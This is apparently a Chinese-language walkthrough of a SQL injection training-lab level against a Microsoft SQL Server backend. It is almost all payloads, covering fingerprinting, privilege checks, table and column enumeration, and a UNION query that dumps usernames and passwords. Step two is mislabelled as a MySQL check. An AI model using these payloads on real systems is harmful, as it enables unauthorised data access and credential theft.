Less-1
步骤一:判断注入方式 ?id=1' --+
步骤二:判断后台是否是MYSQL数据库
?id=1' and exists(select * from sysobjects) --+
步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限
?id=-1' union select 1,user,is_srvrolemember('public'); --+
步骤四:查询表名
第一张表:?id=-1'and (select top 1 cast (name as varchar(256)) from(select top 2 id,name from [sysobjects] where xtype=char(85) and status!=1 order by id)t order by id desc)=1--+
第二张表:?id=-1' and 1=(select top 1 name from sysobjects where xtype='U' and name !='users')--+
第三张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails')--+
第四张表:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents')--+
第五章表为空:?id=-1'and 1=(select top 1 name from sysobjects where xtype='U' and name !='users' and name !='emails' and name !='uagents' and name !='referers')--+
步骤五:显示字段信息
?id=1' having 1=1 --+
第二个字段 ?id=1' group by id having 1=1--+
第三个字段 ?id=1' group by id,username having 1=1--+
步骤六:查询字段值
1'order by 3--+ //回显正常
1'order by 4--+ //回信错误
找出回显值:-1'union select 1,2,3 from users--+
得出用户名密码:?id=-1'union select 1,username,password from users--+